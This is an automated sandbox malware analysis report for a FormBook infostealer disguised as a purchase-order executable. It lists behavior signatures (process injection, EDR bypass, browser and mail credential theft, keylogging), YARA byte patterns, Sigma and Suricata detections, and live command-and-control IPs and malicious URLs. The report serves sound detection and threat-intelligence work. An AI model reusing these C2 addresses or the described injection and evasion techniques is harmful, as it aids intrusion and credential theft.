Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order_ AEPL-2324-1126.exe

Overview

General Information

Sample name:Purchase Order_ AEPL-2324-1126.exe
Analysis ID:1515799
MD5:4d40b6f064db9c79d427ca2a2c9b87ae
SHA1:aeed2a31d23e0615c1f8ecc2f10c9ad285666b2d
SHA256:8b117326a85883033f16c21e24a6e07bcc1cb7cced62623a95c1649e7b727688
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Order_ AEPL-2324-1126.exe (PID: 7444 cmdline: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe" MD5: 4D40B6F064DB9C79D427CA2A2C9B87AE)
    • svchost.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • JkyHsYXxoyjW.exe (PID: 3876 cmdline: "C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • grpconv.exe (PID: 7736 cmdline: "C:\Windows\SysWOW64\grpconv.exe" MD5: 5A13926732E6D349FD060C072BC7FB74)
          • JkyHsYXxoyjW.exe (PID: 3040 cmdline: "C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2f2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c110:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e4b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f2b3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173a2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ParentImage: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, ParentProcessId: 7444, ParentProcessName: Purchase Order_ AEPL-2324-1126.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ProcessId: 7552, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", CommandLine|base64offset|contains: :^, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ParentImage: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe, ParentProcessId: 7444, ParentProcessName: Purchase Order_ AEPL-2324-1126.exe, ProcessCommandLine: "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe", ProcessId: 7552, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:36:57.420097+020028554651A Network Trojan was detected192.168.2.74970381.2.196.1980TCP
            2024-09-23T14:37:21.770309+020028554651A Network Trojan was detected192.168.2.749708103.21.221.480TCP
            2024-09-23T14:37:36.664205+020028554651A Network Trojan was detected192.168.2.74971238.47.232.19680TCP
            2024-09-23T14:37:51.081454+020028554651A Network Trojan was detected192.168.2.749716188.114.97.380TCP
            2024-09-23T14:38:04.655185+020028554651A Network Trojan was detected192.168.2.749720195.110.124.13380TCP
            2024-09-23T14:38:18.235963+020028554651A Network Trojan was detected192.168.2.749724162.0.238.24680TCP
            2024-09-23T14:38:32.686553+020028554651A Network Trojan was detected192.168.2.749728198.50.252.6480TCP
            2024-09-23T14:38:46.718567+020028554651A Network Trojan was detected192.168.2.74973285.159.66.9380TCP
            2024-09-23T14:39:00.365212+020028554651A Network Trojan was detected192.168.2.749736142.250.186.5180TCP
            2024-09-23T14:39:21.619286+020028554651A Network Trojan was detected192.168.2.749740199.59.243.22780TCP
            2024-09-23T14:39:35.074653+020028554651A Network Trojan was detected192.168.2.74974462.149.128.4080TCP
            2024-09-23T14:39:48.399721+020028554651A Network Trojan was detected192.168.2.7497483.33.130.19080TCP
            2024-09-23T14:40:02.265246+020028554651A Network Trojan was detected192.168.2.749752154.198.53.3680TCP
            2024-09-23T14:40:16.346281+020028554651A Network Trojan was detected192.168.2.749756154.38.114.20580TCP
            2024-09-23T14:40:30.937112+020028554651A Network Trojan was detected192.168.2.74976084.32.84.3280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:37:14.218178+020028554641A Network Trojan was detected192.168.2.749704103.21.221.480TCP
            2024-09-23T14:37:16.852379+020028554641A Network Trojan was detected192.168.2.749705103.21.221.480TCP
            2024-09-23T14:37:19.356148+020028554641A Network Trojan was detected192.168.2.749707103.21.221.480TCP
            2024-09-23T14:37:28.123635+020028554641A Network Trojan was detected192.168.2.74970938.47.232.19680TCP
            2024-09-23T14:37:30.783145+020028554641A Network Trojan was detected192.168.2.74971038.47.232.19680TCP
            2024-09-23T14:37:33.546333+020028554641A Network Trojan was detected192.168.2.74971138.47.232.19680TCP
            2024-09-23T14:37:42.195520+020028554641A Network Trojan was detected192.168.2.749713188.114.97.380TCP
            2024-09-23T14:37:45.170542+020028554641A Network Trojan was detected192.168.2.749714188.114.97.380TCP
            2024-09-23T14:37:48.552290+020028554641A Network Trojan was detected192.168.2.749715188.114.97.380TCP
            2024-09-23T14:37:56.856092+020028554641A Network Trojan was detected192.168.2.749717195.110.124.13380TCP
            2024-09-23T14:37:59.468926+020028554641A Network Trojan was detected192.168.2.749718195.110.124.13380TCP
            2024-09-23T14:38:02.168708+020028554641A Network Trojan was detected192.168.2.749719195.110.124.13380TCP
            2024-09-23T14:38:10.578766+020028554641A Network Trojan was detected192.168.2.749721162.0.238.24680TCP
            2024-09-23T14:38:13.137368+020028554641A Network Trojan was detected192.168.2.749722162.0.238.24680TCP
            2024-09-23T14:38:15.731793+020028554641A Network Trojan was detected192.168.2.749723162.0.238.24680TCP
            2024-09-23T14:38:24.704835+020028554641A Network Trojan was detected192.168.2.749725198.50.252.6480TCP
            2024-09-23T14:38:27.900283+020028554641A Network Trojan was detected192.168.2.749726198.50.252.6480TCP
            2024-09-23T14:38:30.166580+020028554641A Network Trojan was detected192.168.2.749727198.50.252.6480TCP
            2024-09-23T14:38:39.360229+020028554641A Network Trojan was detected192.168.2.74972985.159.66.9380TCP
            2024-09-23T14:38:42.467299+020028554641A Network Trojan was detected192.168.2.74973085.159.66.9380TCP
            2024-09-23T14:38:45.014148+020028554641A Network Trojan was detected192.168.2.74973185.159.66.9380TCP
            2024-09-23T14:38:52.649879+020028554641A Network Trojan was detected192.168.2.749733142.250.186.5180TCP
            2024-09-23T14:38:55.445163+020028554641A Network Trojan was detected192.168.2.749734142.250.186.5180TCP
            2024-09-23T14:38:57.763962+020028554641A Network Trojan was detected192.168.2.749735142.250.186.5180TCP
            2024-09-23T14:39:14.931402+020028554641A Network Trojan was detected192.168.2.749737199.59.243.22780TCP
            2024-09-23T14:39:16.524563+020028554641A Network Trojan was detected192.168.2.749738199.59.243.22780TCP
            2024-09-23T14:39:19.088135+020028554641A Network Trojan was detected192.168.2.749739199.59.243.22780TCP
            2024-09-23T14:39:27.378471+020028554641A Network Trojan was detected192.168.2.74974162.149.128.4080TCP
            2024-09-23T14:39:29.906818+020028554641A Network Trojan was detected192.168.2.74974262.149.128.4080TCP
            2024-09-23T14:39:32.458953+020028554641A Network Trojan was detected192.168.2.74974362.149.128.4080TCP
            2024-09-23T14:39:40.589680+020028554641A Network Trojan was detected192.168.2.7497453.33.130.19080TCP
            2024-09-23T14:39:44.067449+020028554641A Network Trojan was detected192.168.2.7497463.33.130.19080TCP
            2024-09-23T14:39:45.831765+020028554641A Network Trojan was detected192.168.2.7497473.33.130.19080TCP
            2024-09-23T14:39:54.540490+020028554641A Network Trojan was detected192.168.2.749749154.198.53.3680TCP
            2024-09-23T14:39:57.105227+020028554641A Network Trojan was detected192.168.2.749750154.198.53.3680TCP
            2024-09-23T14:39:59.935924+020028554641A Network Trojan was detected192.168.2.749751154.198.53.3680TCP
            2024-09-23T14:40:08.418181+020028554641A Network Trojan was detected192.168.2.749753154.38.114.20580TCP
            2024-09-23T14:40:11.121460+020028554641A Network Trojan was detected192.168.2.749754154.38.114.20580TCP
            2024-09-23T14:40:14.093213+020028554641A Network Trojan was detected192.168.2.749755154.38.114.20580TCP
            2024-09-23T14:40:21.927956+020028554641A Network Trojan was detected192.168.2.74975784.32.84.3280TCP
            2024-09-23T14:40:24.493137+020028554641A Network Trojan was detected192.168.2.74975884.32.84.3280TCP
            2024-09-23T14:40:27.052809+020028554641A Network Trojan was detected192.168.2.74975984.32.84.3280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-23T14:39:27.378471+020028563181A Network Trojan was detected192.168.2.74974162.149.128.4080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Purchase Order_ AEPL-2324-1126.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://www.tempatmudisini01.click/phdl/Avira URL Cloud: Label: malware
            Source: http://tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmAvira URL Cloud: Label: malware
            Source: http://www.tempatmudisini01.click/phdl/?76=RacNMaTPN8PTLvXR9NF5eW2iQDieTkk5np6gf4eeXsIapVFDjThj3jiQkVzZmExioktz4vqZ0cfToK8eCYqJupED41Yr5DEkLX4m9t/uleGnewHbryEHDsS5u5fKmXjTxI+rab/4BaXG&mtJD_=fvdlJ2LAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: chalet-tofane.netVirustotal: Detection: 8%Perma Link
            Source: tempatmudisini01.clickVirustotal: Detection: 5%Perma Link
            Source: www.tempatmudisini01.clickVirustotal: Detection: 7%Perma Link
            Multi AV Scanner detection for submitted file
            Source: Purchase Order_ AEPL-2324-1126.exeVirustotal: Detection: 27%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Purchase Order_ AEPL-2324-1126.exeJoe Sandbox ML: detected
            Source: Purchase Order_ AEPL-2324-1126.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: grpconv.pdb source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: grpconv.pdbGCTL source: svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JkyHsYXxoyjW.exe, 00000003.00000002.3862718845.00000000005BE000.00000002.00000001.01000000.00000004.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3858733307.00000000005BE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1472280499.0000000004680000.00000004.00001000.00020000.00000000.sdmp, Purchase Order_ AEPL-2324-1126.exe, 00000000.00000003.1471126837.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1628089939.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1500202206.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1628089939.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498259750.0000000003300000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000005.00000002.3869522876.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1630288499.000000000436D000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000003.1627999026.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3869522876.0000000004520000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: grpconv.exe, 00000005.00000002.3859947867.000000000279A000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000005.00000002.3870343838.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000000.1694933032.0000000002C6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1925812145.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 5_2_002EC5F0 FindFirstFileW,FindNextFileW,FindClose,5_2_002EC5F0
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then xor eax, eax5_2_002D9B30
            Source: C:\Windows\SysWOW64\grpconv.exeCode function: 4x nop then mov ebx, 00000004h5_2_043004E8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49728 -> 198.50.252.64:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49709 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49711 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49740 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49720 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49739 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49754 -> 154.38.114.205:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49744 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49737 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49726 -> 198.50.252.64:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49703 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49712 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49714 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49753 -> 154.38.114.205:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49760 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49741 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49729 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49741 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49759 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49742 -> 62.149.128.40:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49746 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49704 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49717 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49735 -> 142.250.186.51:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49718 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49751 -> 154.198.53.36:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49707 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49752 -> 154.198.53.36:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49716 -> 188.114.97.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49705 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49736 -> 142.250.186.51:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49734 -> 142.250.186.51:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49723 -> 162.0.238.246:80
